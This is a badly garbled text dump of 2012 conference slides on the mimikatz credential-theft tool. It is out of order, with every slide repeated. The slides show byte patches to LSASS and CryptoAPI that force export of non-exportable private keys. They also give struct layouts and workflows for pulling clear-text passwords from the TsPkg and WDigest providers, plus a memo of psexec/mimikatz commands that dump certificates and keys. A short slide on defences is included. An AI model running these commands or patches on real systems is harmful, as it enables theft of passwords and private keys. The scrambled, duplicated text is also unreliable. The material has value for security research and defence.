text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
